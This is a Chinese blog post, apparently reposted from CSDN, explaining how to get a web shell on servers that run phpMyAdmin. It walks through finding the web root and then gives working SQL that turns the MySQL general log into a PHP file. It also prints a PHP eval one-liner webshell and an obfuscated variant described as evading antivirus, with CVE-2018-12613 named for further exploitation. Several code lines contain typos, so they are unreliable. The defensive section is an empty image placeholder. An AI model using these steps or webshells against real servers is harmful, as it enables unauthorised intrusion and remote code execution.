phpMyadmin getshell思路

一.phpMyadmin简介

phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性。

二.phpMyadmin getshell思路

1.流程简述

在这里插入图片描述

2.信息收集

在这里插入图片描述

3.获取网站真实路径的作用一

@ Phpinfo()函数直接获取
通过 phpinfo.php或 phpinfo者()进行获取网站真实路径。(phpinfo.php执行的 phpinfo就是函数)
在这里插入图片描述在这里插入图片描述

@ 读取配置文件
在 Mysqlload中file函数可以用于读取文件。我们可以借助该函数读取网站配置文件进而获取网站的真实路径。
该函数能否成功执行全由参数 secure_file_priv决定,
在这里插入图片描述
查询该值可通过命令:

select @secure file_priv
(该值不能动态更改只能通过配置文件修改,然后重启服务器才能生效。)
在这里插入图片描述
(对该文件必须有可读权限,并且大小不能大于 max allowed_packet,同时 magic quotes gpc=off)
案例[https://blog.csdn.net/qq_41901122/article/details/104433502]
@ 构造报错页面获取网站真实路径

通过构造报错有可能会报出网站的真实路径(页面访问报错、sq注入报错、文件包含报错) @特定CMS爆路径

@ 借助搜索引擎

借助搜索引擎例如百度、谷歌、fofa、 shadon、 zoomeye等搜索 关键字” error",有可能会报出网站真实路径。例如site:xxx. com error 还有可以通过快照获取真实信息。

4.漏洞挖掘和利用
@ 检测满足写shell的前提条件
在这里插入图片描述

@ 常规写shell思路
@ 日志写shell思路
我们首先需要检测的是 MySQL全局变量(general_log、general_log file)的值
在这里插入图片描述

第一步 开启日志保存

 set global general log ="ON";
 set global general logfile=:phpStudyPHPTutorial/www/infos.php(网站真实路径)

第二步 写shell(这里写入一句话)

 select '<?php eval($_POST['qwe'])>;
免杀一句话(过狗)
 $arr array('a','s','s', 'e','r','t' );
 $func= " ";
 for(Si=O;$i<count($arr);$i++){
 $func.=$func. $arr[$i];
 }
 $func substr($func,-6);
 $func($ REQUEST['c']);

@特殊版本漏洞利用

第一步 确定版本信息 
第二步 获取漏洞利用所需信息(路径、系统等)
第三步明确漏洞利用的具体方式
第四步  开始利用

案例:
CVE-2018-12613phpmyadmin(文件包含)

三.phpMyadmin 漏洞防范方式

在这里插入图片描述

免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!

发布了278 篇原创文章 · 获赞 57 · 访问量 10万+

猜你喜欢

转载自blog.csdn.net/qq_41901122/article/details/104718745